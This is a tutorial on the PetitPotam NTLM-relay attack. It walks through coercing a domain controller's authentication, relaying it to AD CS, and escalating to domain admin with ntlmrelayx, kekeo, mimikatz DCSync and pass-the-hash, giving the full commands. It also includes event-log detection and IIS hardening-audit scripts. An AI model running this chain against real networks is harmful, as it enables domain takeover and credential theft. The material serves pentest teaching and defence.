In this article, I will talk about the PetitPotam attack, which, under certain conditions, allows taking over a domain controller in just a few steps. The attack relies on the fact that you can force a domain controller to authenticate to your host, capture its NTLM authentication and relay it to Active Directory Certificate Services for privilege escalation. The article is intended for pentesters and those who want to learn about current attacks on Active Directory.
About PetitPotam
The vulnerability was discovered by security researcher Gilles Lionel on July 18, 2021. PetitPotam forces a domain controller to authenticate to an arbitrary remote server. It does so through the EfsRpcOpenFileRaw method of MS-EFSRPC, which makes the computer account authenticate to another system. The EFSRPC protocol is used to maintain and manage encrypted data that is stored remotely and accessed over the network.
With PetitPotam, you can force a domain controller to initiate an authentication process on a server under the attacker's control and share the NTLM hash value with it. Using the received data, an attacker can carry out an NTLM-relay attack.
NTLM-relay at a glance
An NTLM-relay attack interferes with an NTLM authentication exchange: the attacker receives the authentication of the user or service that is trying to authenticate and forwards it to a third-party resource, gaining access to that resource with the privileges of the attacked account. The attack can be carried out against any protocol that supports NTLM authentication (SMB, HTTP, LDAP, etc.).
https://en.hackndo.com/ntlm-relay/#authentication-vs-session
By using the PetitPotam attack, an attacker can elevate their privileges to domain administrator. For a successful attack, it is necessary that:
- the attacker has access to the internal network;
- the Web Enrollment role is enabled in Active Directory Certificate Services (AD CS).
The attacker therefore relays the domain controller's NTLM authentication to the AD CS Web Enrollment interface and requests a certificate on behalf of the domain controller. This certificate is then used to request a TGT (Ticket Granting Ticket).
TGT at a glance
After the user authenticates successfully, the Key Distribution Center issues a Ticket Granting Ticket, the primary credential used to request access to network resources. If such a ticket is forged with the key of the Kerberos service account (krbtgt), it is called a Golden Ticket and allows its holder to authenticate to any server in the domain.
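Each stage of the chain described above leaves a trace in the Windows Security log: the coerced NTLM logon of the domain controller's computer account on the AD CS server (event 4624), the certificate that AD CS issues to that account (event 4887), and the TGT request that uses a certificate instead of a password (event 4768 with pre-authentication type 16, PA-PK-AS-REQ). The following Python script is an added example for this article, not code from the original post or from the impacket or PetitPotam projects. It correlates those three events over constructed, simplified event records; the host names (ADCS01, DC01), account names and the sets DC_ACCOUNTS, DC_ADDRESSES and ADCS_HOSTS are assumptions matching the lab layout in this article, and a real deployment would feed the functions from a SIEM export.

```python
"""Detect the PetitPotam -> NTLM relay -> AD CS -> PKINIT chain in Windows events.

Added example for this article; not code from the original post, from impacket
or from PetitPotam. Events are constructed, simplified dicts carrying fields of
Security log events 4624 (logon), 4887 (AD CS issued a certificate) and 4768
(TGT requested). Names and addresses are constructed to match the lab layout.
"""
from datetime import datetime, timedelta

# Constructed environment knowledge: DC computer accounts, DC addresses and the
# hosts running AD CS Web Enrollment. Adjust for a real environment.
DC_ACCOUNTS = {"DC01$"}
DC_ADDRESSES = {"192.168.0.122"}
ADCS_HOSTS = {"ADCS01"}
WINDOW = timedelta(minutes=10)  # max gap between coerced logon and issuance


def _ts(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def coerced_ntlm_logons(events):
    """Stage 1: a DC computer account logs on to the AD CS server over NTLM from
    an address that is not a DC. A DC talking to CertSrv itself would normally
    use Kerberos from its own address; the relayed exchange arrives from the
    relay host instead."""
    return [
        ev for ev in events
        if ev["EventID"] == 4624
        and ev["Computer"] in ADCS_HOSTS
        and ev["LogonType"] == 3
        and ev["AuthenticationPackageName"] == "NTLM"
        and ev["TargetUserName"] in DC_ACCOUNTS
        and ev["IpAddress"] not in DC_ADDRESSES
    ]


def relayed_enrollments(events):
    """Stage 2: shortly after a stage-1 logon, the same AD CS server issues a
    certificate (4887) whose requester is that DC account. Taken alone, 4887 for
    a DC account is normal autoenrollment noise; the correlation is the signal."""
    hits = []
    for logon in coerced_ntlm_logons(events):
        for ev in events:
            if ev["EventID"] != 4887 or ev["Computer"] != logon["Computer"]:
                continue
            # Requester is logged as DOMAIN\account; compare the account part.
            requester = ev["Requester"].split("\\")[-1]
            if requester != logon["TargetUserName"]:
                continue
            if timedelta(0) <= _ts(ev) - _ts(logon) <= WINDOW:
                hits.append((logon, ev))
    return hits


def pkinit_tgts_for_dc_accounts(events):
    """Stage 3: a TGT is requested for a DC computer account with a certificate
    (pre-authentication type 16 = PA-PK-AS-REQ) from a non-DC address. This
    fires on its own, whatever path produced the certificate."""
    return [
        ev for ev in events
        if ev["EventID"] == 4768
        and ev["TargetUserName"] in DC_ACCOUNTS
        and ev["PreAuthType"] == "16"
        and ev["IpAddress"] not in DC_ADDRESSES
    ]


def detect(events):
    """Return (stage, identifying value) findings for the whole chain."""
    findings = []
    for ev in coerced_ntlm_logons(events):
        findings.append(("coerced_ntlm_logon", ev["TimeCreated"]))
    for _logon, cert in relayed_enrollments(events):
        findings.append(("relayed_enrollment", cert["RequestId"]))
    for ev in pkinit_tgts_for_dc_accounts(events):
        findings.append(("pkinit_tgt_for_dc", ev["IpAddress"]))
    return findings


# Constructed sample: a benign Kerberos logon by the DC, the three chain stages,
# and a benign workstation autoenrollment that must not be flagged.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "ADCS01", "TimeCreated": "2021-07-25T09:00:00",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "DC01$", "IpAddress": "192.168.0.122"},
    {"EventID": 4624, "Computer": "ADCS01", "TimeCreated": "2021-07-25T09:12:03",
     "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "DC01$", "IpAddress": "192.168.0.124"},
    {"EventID": 4887, "Computer": "ADCS01", "TimeCreated": "2021-07-25T09:12:04",
     "RequestId": "41", "Requester": "DEITERIY\\DC01$",
     "Attributes": "CertificateTemplate:KerberosAuthentication"},
    {"EventID": 4887, "Computer": "ADCS01", "TimeCreated": "2021-07-25T09:30:00",
     "RequestId": "42", "Requester": "DEITERIY\\WS07$",
     "Attributes": "CertificateTemplate:Machine"},
    {"EventID": 4768, "Computer": "DC01", "TimeCreated": "2021-07-25T09:15:40",
     "TargetUserName": "DC01$", "PreAuthType": "16", "IpAddress": "192.168.0.124"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The stage-2 check is deliberately a correlation rather than a standalone rule: domain controllers enroll for the DomainController and KerberosAuthentication templates as a matter of course, so a 4887 event for a DC account only becomes interesting when it follows an NTLM logon of that account from an address that is not a DC. The stage-3 check stands on its own, because a DC computer account obtaining a TGT by certificate from an unexpected address is rare in a healthy domain.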
Next, we will look at the algorithm of actions for the attack.
Attack scheme
The attack was tested on Windows Server 2019 (OS version 10.0.17763).
- Run ntlmrelayx to relay the domain controller's credentials to AD CS
- Run PetitPotam to make the domain controller authenticate over NTLM to the attacker-controlled server (ntlmrelayx)
- Obtain the PKCS12 certificate in base64 format
- Import the certificate into kekeo (to request a TGT)
- Run mimikatz to dump SAM secrets for the selected user
- Perform a Pass-the-hash attack
- 192.168.0.123 - AD CS (Windows Server 2019)
- 192.168.0.122 - Domain Controller (Windows Server 2019)
- 192.168.0.124 - NTLM-listener (Kali linux)
Step 1. Launch ntlmrelayx
Preparation
Code:
git clone https://github.com/ExAndroidDev/impacket.git
cd impacket
sudo pip3 uninstall impacket
sudo pip uninstall impacket
sudo pip3 install -r requirements.txt
sudo python3 setup.py install
sudo python3 ntlmrelayx.py -debug -smb2support --target http://192.168.0.123/certsrv/certfnsh.asp --adcs --template KerberosAuthentication
To have ntlmrelayx relay the NTLM hash of the domain controller to AD CS, we use the KerberosAuthentication template, but you can also use the DomainControllers template.
If you go to https://192.168.0.123/certsrv/certfnsh.asp , we will see an authentication form.
Step 2. PetitPotam
Preparation
Code:
python3 Petitpotam.py 192.168.0.124 192.168.0.122
While ntlmrelayx waits for connections, we use PetitPotam to make the domain controller authenticate over NTLM to the attacker-controlled server, so that ntlmrelayx can relay that authentication to AD CS.
Step 3. PKCS12 certificate
On the machine running ntlmrelayx we receive a base64-encoded PKCS12 certificate, which AD CS has issued in the name of the domain controller.
This certificate can be used to obtain a TGT in the Kerberos Authentication Service.
Step 4. Import PKCS12 to kekeo
Preparation
Code:
curl https://github.com/gentilkiwi/kekeo/releases/download/2.2.0-20210723/kekeo.zip -o kekeo.zip
tar -xf .\kekeo.zip
We import this certificate into kekeo.
Code:
.\kekeo.exe
base64 /input:on
tgt::ask /pfx:<base64 certificate from step 3> /user:<user from step 3> /domain:<domain name> /ptt
Step 5. Mimikatz
Preparation
Code:
curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip -o mimikatz.zip
tar -xf mimikatz.zip
.\mimikatz.exe
lsadump::dcsync /domain:<domain name> /user:<any user>
We now have a TGT that we can use to authenticate to any host in the domain. With it, we can get the NTLM hash of any domain user from a domain controller.
Use mimikatz to dump the NTLM hash of the user adm, who is the domain administrator.
Code:
mimikatz # lsadump::dcsync /domain:DEITERIY.LAB /user:adm
Step 6. Pass-the-hash
Using Pass-the-hash, we authenticate on any host, for example, on a domain controller.
Code:
wmiexec.exe -hashes :<NTLM hash of adm> DEITERIY/adm@192.168.0.122
Conclusion
In this way, in a few steps, you can elevate your privileges to domain administrator. It is worth noting that attacks based on NTLM relay have been around for a long time, but PetitPotam stands out among them because it requires neither credentials nor user interaction to make the domain controller authenticate to the attacker's server. Microsoft's recommended precautions can be found here: https://support.microsoft.com/en-gb...s-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429
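Microsoft's guidance for this attack hardens the IIS application that hosts Web Enrollment (the CertSrv site that ntlmrelayx targets in step 1): Extended Protection for Authentication set to Required, SSL required so that EPA can bind the NTLM exchange to the TLS channel, and, where clients allow it, NTLM removed from the authentication providers in favour of Negotiate:Kerberos. The script below is an added example for this article, not code from the original post or from Microsoft. It audits one IIS `<location>` element for the CertSrv application against those three settings. The two configuration fragments are constructed: the weak one reflects the default state a freshly installed Web Enrollment site has, the hardened one the mitigated state; on a real server the element would be read from applicationHost.config under %windir%\System32\inetsrv\config.

```python
"""Audit the IIS settings of an AD CS Web Enrollment (CertSrv) site for the
NTLM-relay mitigations: EPA required, SSL required, NTLM not offered.

Added example for this article; not code from the original post or from
Microsoft. The two <location> fragments are constructed for illustration.
"""
import xml.etree.ElementTree as ET

# Constructed fragment: default Web Enrollment state, which relaying relies on.
WEAK_CONFIG = """
<location path="Default Web Site/CertSrv">
  <system.webServer>
    <security>
      <access sslFlags="None" />
      <authentication>
        <windowsAuthentication enabled="true">
          <extendedProtection tokenChecking="None" flags="None" />
          <providers>
            <clear />
            <add value="Negotiate" />
            <add value="NTLM" />
          </providers>
        </windowsAuthentication>
      </authentication>
    </security>
  </system.webServer>
</location>
"""

# Constructed fragment with the mitigations applied: EPA required, HTTPS
# required, and only Kerberos offered, so a relayed NTLM exchange is refused.
HARDENED_CONFIG = """
<location path="Default Web Site/CertSrv">
  <system.webServer>
    <security>
      <access sslFlags="Ssl, SslNegotiateCert" />
      <authentication>
        <windowsAuthentication enabled="true">
          <extendedProtection tokenChecking="Require" flags="None" />
          <providers>
            <clear />
            <add value="Negotiate:Kerberos" />
          </providers>
        </windowsAuthentication>
      </authentication>
    </security>
  </system.webServer>
</location>
"""


def audit_certsrv(location_xml):
    """Return {check: (passed, detail)} for one CertSrv <location> element."""
    root = ET.fromstring(location_xml)
    results = {}

    # 1. EPA binds the NTLM exchange to the TLS channel the client opened; an
    #    exchange relayed from another connection carries the wrong binding.
    ep = next(root.iter("extendedProtection"), None)
    token = ep.get("tokenChecking", "None") if ep is not None else "None"
    results["epa_required"] = (token == "Require", f"tokenChecking={token}")

    # 2. Channel binding only exists over HTTPS, so plain HTTP must be refused.
    access = next(root.iter("access"), None)
    flags = access.get("sslFlags", "None") if access is not None else "None"
    flag_set = {f.strip() for f in flags.split(",")}
    results["ssl_required"] = ("Ssl" in flag_set, f"sslFlags={flags}")

    # 3. With no NTLM-capable provider there is nothing to relay. Bare
    #    "Negotiate" can fall back to NTLM, so only "Negotiate:Kerberos" counts
    #    as safe. An absent <providers> means the IIS defaults (Negotiate, NTLM).
    wa = next(root.iter("windowsAuthentication"), None)
    providers = wa.find("providers") if wa is not None else None
    if providers is None:
        values = ["Negotiate", "NTLM"]
    else:
        values = [a.get("value") for a in providers.findall("add")]
    ntlm_capable = [v for v in values if v in ("NTLM", "Negotiate")]
    results["ntlm_disabled"] = (not ntlm_capable, f"providers={values}")
    return results


def is_hardened(location_xml):
    """True when every mitigation check passes."""
    return all(passed for passed, _ in audit_certsrv(location_xml).values())


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_certsrv(cfg))
```

Treat the third check as advisory: removing NTLM from the provider list breaks enrollment from clients that cannot do Kerberos against the site, so EPA plus required SSL is the minimum that defeats the relay in this article, and provider changes come after checking who still enrolls over NTLM.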
As additional materials, I recommend that you read the articles: